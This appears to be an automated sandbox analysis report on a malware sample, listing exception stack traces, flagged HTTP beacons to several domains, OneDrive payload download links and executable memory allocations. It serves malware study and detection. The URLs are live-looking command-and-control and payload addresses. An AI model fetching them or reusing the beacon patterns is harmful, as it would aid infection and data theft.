__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.cdgdentists.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=EXbQHeCb31o1gaBaR2ATYI6ExABbI7DKLBQ2CIR3ARrEXHsMlpnG7TJ7X1JozzLBrtTu60nh
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.amaroqadvisors.com/ht08/?jrQDrX=u/HH8oXplBhOFryswzp14fRHx2iZXqd5LlKZ1+of1fszA0QUqCsF/wVmyePk0HUmpsPYuBxx&p0D=QfrDsny8j2kPE0s
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.septemberstockevent200.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=YVcVQnABcJsSl1vo8PwpXZC8MGRy3pUK9T1n+/sxD5UspzF5wJe0fyLK9odyh4hH5ST6BMWP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.swisstradecenter.com/ht08/?jrQDrX=QSE46j0HNZ2QncZWLMtuNIJxO3VJtHj2iE4I7IkNciklA1BQH3YeyQjbp0g62VHrm1UWPSce&p0D=QfrDsny8j2kPE0s
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.oilelm.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=+MKoH/T1lSGBa8iWH91/ZquhTarcPNk/tfbZWgzq/IKlWL2S/ubFt9bqD7NQKtX6NP3pa9SI
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.oooci.com/ht08/?jrQDrX=N3mp3TnmlmOVAV+GBSkbxeVJeF+TLCeopoFxOLndztPBPVOFElj2miXAPLJhlFBp52cue+7l&p0D=QfrDsny8j2kPE0s
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.trashwasher.com/ht08/?jrQDrX=uW1sPHtGTFBUTkesgE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFTm+zdWq2zbODeL2N+lp&p0D=QfrDsny8j2kPE0s
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.kinmanpowerwashing.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=wJPYOBNPPe4q/AU39b/otaYCYPUa59MhN5lNfdB/7j2pgKnFe5P4sOF7ywpp0IQx2Nw/u5M7

Performs some HTTP requests (11 events)

request	GET http://www.cdgdentists.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=EXbQHeCb31o1gaBaR2ATYI6ExABbI7DKLBQ2CIR3ARrEXHsMlpnG7TJ7X1JozzLBrtTu60nh
request	GET http://www.amaroqadvisors.com/ht08/?jrQDrX=u/HH8oXplBhOFryswzp14fRHx2iZXqd5LlKZ1+of1fszA0QUqCsF/wVmyePk0HUmpsPYuBxx&p0D=QfrDsny8j2kPE0s
request	GET http://www.septemberstockevent200.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=YVcVQnABcJsSl1vo8PwpXZC8MGRy3pUK9T1n+/sxD5UspzF5wJe0fyLK9odyh4hH5ST6BMWP
request	GET http://www.swisstradecenter.com/ht08/?jrQDrX=QSE46j0HNZ2QncZWLMtuNIJxO3VJtHj2iE4I7IkNciklA1BQH3YeyQjbp0g62VHrm1UWPSce&p0D=QfrDsny8j2kPE0s
request	GET http://www.oilelm.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=+MKoH/T1lSGBa8iWH91/ZquhTarcPNk/tfbZWgzq/IKlWL2S/ubFt9bqD7NQKtX6NP3pa9SI
request	GET http://www.oooci.com/ht08/?jrQDrX=N3mp3TnmlmOVAV+GBSkbxeVJeF+TLCeopoFxOLndztPBPVOFElj2miXAPLJhlFBp52cue+7l&p0D=QfrDsny8j2kPE0s
request	GET http://www.trashwasher.com/ht08/?jrQDrX=uW1sPHtGTFBUTkesgE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFTm+zdWq2zbODeL2N+lp&p0D=QfrDsny8j2kPE0s
request	GET http://www.kinmanpowerwashing.com/ht08/?p0D=QfrDsny8j2kPE0s&jrQDrX=wJPYOBNPPe4q/AU39b/otaYCYPUa59MhN5lNfdB/7j2pgKnFe5P4sOF7ywpp0IQx2Nw/u5M7
request	GET https://onedrive.live.com/download?cid=BCFBDC0738CBFF0F&resid=BCFBDC0738CBFF0F%21109&authkey=AONmXFICrRaoFt4
request	GET https://owfboa.dm.files.1drv.com/y4mUfne4wayPOFatX-pbl6vWAtr619eHfZxjSq-Nz-7Vqg6l3ceiOlz0DebBFWCOW_3msvrTRqCAoBdhpjV1KeyTZ4XPy4CNzV-5M1Cq7oXAB8kGm9SPNgqXKQVg3qkcrWjuAv9rbUSvXX_Z34Ybr5jYUlszfdrxqFZhzKrUigROi5ITLXVl3DcbLodY3blfsCvabJpAY3zWSWxQMGIxQVszQ/Ewzmyhkhgsejfrjfwzttwocuueudzgr?download&psid=1
request	GET https://owfboa.dm.files.1drv.com/y4mmGEQ-1TDGWvA6srDdg7lIrn1Oc-IcieS9yK0yjEgqixnisRz1pHwTYHyXpmsBWdPtArgy7blgdempTtadNiVRcbinYKYCyletcXYWpE5khUcMHXWFto4eVdeTdAIrs0BatLzvepPG8tTU5ebW2mvg4zCaH1LHQxf_F95RdwjWiFbiFK28ZqFIaBN0iq15Gfi0vvbafd9LrWYvE6pJ7efIA/Ewzmyhkhgsejfrjfwzttwocuueudzgr?download&psid=1

Allocates read-write-execute memory (usually to unpack itself) (7 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 5 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000 process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 5 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000 process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 5 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000 process_handle: 0xffffffff		3221225496
NtAllocateVirtualMemory Oct. 21, 2021, 6:42 p.m.	process_identifier: 2364 region_size: 167936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
